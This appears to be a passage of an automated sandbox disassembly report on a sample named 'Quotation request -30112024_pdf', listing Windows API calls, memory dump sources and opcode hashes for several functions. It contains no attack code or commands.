                                                                    • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                    APIs
                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                    • LineTo.GDI32(?,?,?), ref: 00447326
                                                                    • EndPath.GDI32(?), ref: 00447336
                                                                    • StrokePath.GDI32(?), ref: 00447344
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 2783949968-0
                                                                    • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                    • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                    • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                    • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                    • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                    • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                    • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                    • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                      • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                      • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                    • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                    • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                    • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00472B63
                                                                    • GetDC.USER32(00000000), ref: 00472B6C
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                    • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                    • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                    • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 00472BB2
                                                                    • GetDC.USER32(00000000), ref: 00472BBB
                                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                    • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                    • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                    • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                    APIs
                                                                    • __getptd_noexit.LIBCMT ref: 00415150
                                                                      • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                      • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                      • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                      • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                      • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                    • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                    • __freeptd.LIBCMT ref: 0041516B
                                                                    • ExitThread.KERNEL32 ref: 00415173
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1454798553-0
                                                                    • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                    • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                    • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                    • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _strncmp
                                                                    • String ID: Q\E
                                                                    • API String ID: 909875538-2189900498
                                                                    • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                    • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                    • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                    • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                    • String ID: AutoIt3GUI$Container
                                                                    • API String ID: 2652923123-3941886329
                                                                    • Opcode ID: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                                                    • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                    • Opcode Fuzzy Hash: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                                                    • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove_strncmp
                                                                    • String ID: U$\
                                                                    • API String ID: 2666721431-100911408
                                                                    • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                    • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                    • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                    • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                    APIs
                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                    • __wcsnicmp.LIBCMT ref: 00467288
                                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                    • String ID: LPT
                                                                    • API String ID: 3035604524-1350329615
                                                                    • Opcode ID: 78409a4fa05b1c2a75f678cb610307e3b76213f7ca39e6632357cd416624c234
                                                                    • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                    • Opcode Fuzzy Hash: 78409a4fa05b1c2a75f678cb610307e3b76213f7ca39e6632357cd416624c234
                                                                    • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \$h
                                                                    • API String ID: 4104443479-677774858
                                                                    • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                    • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                    • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                    • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID: &
                                                                    • API String ID: 2931989736-1010288
                                                                    • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                    • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                    • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                    • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \
                                                                    • API String ID: 4104443479-2967466578
                                                                    • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                    • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                    • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                    • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00466825
                                                                    • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_wcslen
                                                                    • String ID: |
                                                                    • API String ID: 596671847-2343686810
                                                                    • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                    • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                    • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                    • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                    • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                    • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                    • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                    APIs
                                                                    • _strlen.LIBCMT ref: 0040F858
                                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                    • _sprintf.LIBCMT ref: 0040F9AE
                                                                    Strings
                                                                    Memory Dump Source
